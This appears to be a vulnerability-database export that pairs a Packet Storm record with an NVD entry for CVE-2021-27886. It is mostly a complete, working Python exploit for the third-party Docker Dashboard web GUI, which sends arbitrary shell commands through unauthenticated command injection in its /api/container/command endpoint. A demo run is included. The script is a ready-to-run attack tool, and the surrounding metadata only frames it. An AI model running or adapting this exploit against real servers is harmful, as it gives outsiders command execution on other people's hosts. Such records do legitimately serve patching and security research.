DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:163416", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Docker Dashboard Remote Command Execution", "description": "", "published": "2021-07-07T00:00:00", "modified": "2021-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://packetstormsecurity.com/files/163416/Docker-Dashboard-Remote-Command-Execution.html", "reporter": "Jeremy Brown", "references": [], "cvelist": ["CVE-2021-27886"], "immutableFields": [], "lastseen": "2021-07-07T16:13:08", "viewCount": 280, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27886"]}], "rev": 4}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-27886"]}]}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/163416/dockdash-exec.py.txt", "sourceData": "`#!/usr/bin/python \n# -*- coding: UTF-8 -*- \n# \n# dockdash.py \n# \n# Docker Dashboard Remote Command Execution Exploit \n# \n# Jeremy Brown [jbrown3264/gmail] \n# July 2021 \n# \n# \"A simple web based GUI for managing Docker containers and images\" \n# \n# Note: this app is NOT part of the official docker product, nor related to the \n# Docker Dashboard UI in Docker Desktop. They are different projects and maintainers. \n# \n# More info: https://dockerdashboard.github.io \n# \n# ------- \n# Details \n# ------- \n# \n# The web GUI runs on port 3230. There are two main issues that enable the RCE... \n# \n# 1) Although when starting the server it says go to http://localhost:3230, it's \n# actually listening on the network interface by default. There is no auth \n# so anyone with access can start exercising functionality of the app. \n# \n# 2) Normally these controllers are used to start, stop or create new containers. \n# But no validation of parameters or filtering based on acceptable commands sent \n# sent to docker on the backend enables clean, vanilla command injection as the \n# running user. Many of the APIs are vulnerable, with the most notables ones \n# being /api/container/command and /api/image/command. \n# \n# ---- \n# Demo \n# ---- \n# \n# > ./dockdash.py 10.1.1.102 \"uname -a;pwd\" \n# Linux ubuntu 5.4.0-48-generic #51-Ubuntu x86_64 GNU/Linux \n# /opt/docker-web-gui/backend \n# \n# CVE-2021-27886 \n# \n# Fix \n# - commit 79cdc41 \n# \n \nimport sys \nimport argparse \nimport requests \n \nDEFAULT_PORT = 3230 \nSIGNATURE = ('X-Powered-By', 'Express') \n \nclass DockDash(object): \ndef __init__(self, args): \nself.target = args.target \nself.cmd = args.cmd \n \ndef run(self): \ntarget = \"http://\" + self.target + ':' + str(DEFAULT_PORT) \n \nsession = requests.Session() \n \ntry: \nresp = session.head(target + \"/\") \nexcept Exception as error: \nprint(\"Error: %s\" % error) \nreturn -1 \n \nif(SIGNATURE not in resp.headers.items()): \nprint(\"%s doesn't look like a dashboard server...\" % target) \nreturn -1 \n \ncommands = self.cmd.split(';') \n \n# \n# \"out here trying to get a mf'in scholarship\" \n# \nfor command in commands: \ntry: \nresp = session.get(target + \\ \n\"/api/container/command?container=&command=;\" + command) \n#\"/api/image/command?image=&command=;\" + command) \nexcept Exception as error: \nprint(\"Error: %s\" % error) \nreturn -1 \n \nif(resp.status_code == 200): \nresponse = resp.text.strip('\"').replace('\\\\n', '\\n') \nprint(\"%s\" % response) \nelse: \nprint(\"something went wrong, server returned %d\" % resp.status_code) \nreturn -1 \n \nreturn 0 \n \ndef arg_parse(): \nparser = argparse.ArgumentParser() \n \nparser.add_argument(\"target\", \ntype=str, \nhelp=\"DD host\") \n \nparser.add_argument(\"cmd\", \ntype=str, \nhelp=\"command to execute\") \n \nargs = parser.parse_args() \n \nreturn args \n \ndef main(): \nargs = arg_parse() \n \ndd = DockDash(args) \n \nresult = dd.run() \n \nif(result > 0): \nsys.exit(-1) \n \nif(__name__ == '__main__'): \nmain() \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646047285, "score": 1659846169}, "_internal": {"score_hash": "e45502a0bfd5e8a19fec4c4b8c64bcfc"}}

{"cve": [{"lastseen": "2022-05-23T17:00:46", "description": "rakibtg Docker Dashboard before 2021-02-28 allows command injection in backend/utilities/terminal.js via shell metacharacters in the command parameter of an API request. NOTE: this is NOT a Docker, Inc. product.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T00:15:00", "type": "cve", "title": "CVE-2021-27886", "cwe": [], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27886"], "modified": "2022-05-23T15:59:00", "cpe": [], "id": "CVE-2021-27886", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27886", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}]}